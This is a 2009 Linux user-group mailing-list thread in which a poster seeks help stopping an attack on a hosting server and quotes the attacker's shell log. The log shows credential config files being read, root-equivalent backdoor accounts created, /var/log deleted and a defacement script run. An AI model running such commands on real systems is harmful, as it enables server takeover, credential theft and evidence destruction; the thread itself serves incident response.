[GLLUG] server attack

[Eduardo Cesconetto]

the idea to stop this is to disable mass.pl from accessing ssh, right?  
disabling perl would basically kill the server's main functions, so  
it's not an option..


On Sep 20, 2009, at 7:28 PM, Eduardo Cesconetto wrote:

> A friend's hosting server is being attacked by somebody using mass.pl
> to change the index.html files in all the user folders, here part of a
> log:
>
> cd ..
> cat /home/*/public_html/configuration.php > hard.txt
> useradd -o -u 0 sshdd
> /usr/sbin/useradd -o -u 0 sshdd
> passwd sshdd
> /usr/sbin/useradd -o -u 0 apachee
> passwd apachee
> /usr/sbin/useradd -o -u 0 apach
> passwd apach
> /etc/init.d/sshd restart
> /etc/init.d/sshd stop
> /etc/init.d/sshd start
> rm hard.txt
> cat /home/*/public_html/config.php > hard.txt
> ls -lia
> rm hard.txt
> cd ..
> cat /home/*/public_html/config.php > hard.txt
> rm hard.txt
> cat /home/*/public_html/configuration.php > hard.txt
> rm hard.txt
> cat /home/*/public_html/wp-config.php > hard.txt
> rm hard.txt
> ls -lia /etc
> ls /etc/valiases > hard.txt
> rm hard.txt
> ls -lia /etc/valiases > hard.txt
> ls -lia /
> rm -r var/log
> rm -r /var/log
> mkdir /var/log
> ls -lia
> crm user1
> rm user1.php
> cd cgi-bin
> ls -lia
> rm -r hard
> cd ..
> rm hard
> cd cgi-bin
> cd ..
> rm hard.txt
> cd cgi-bin
> ls -lia
> pwd
> perl mass.pl
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/
> hard.html
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/
> hard.html
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/
> hard.html
> [9/20/09 7:13:55 PM] konrath: encontrei isso ae em cima
>
>
>
> any ideas on how to stop this?
>
>
> _______________________________________________
> linux-user mailing list
> linux-user at egr.msu.edu
> http://mailman.egr.msu.edu/mailman/listinfo/linux-user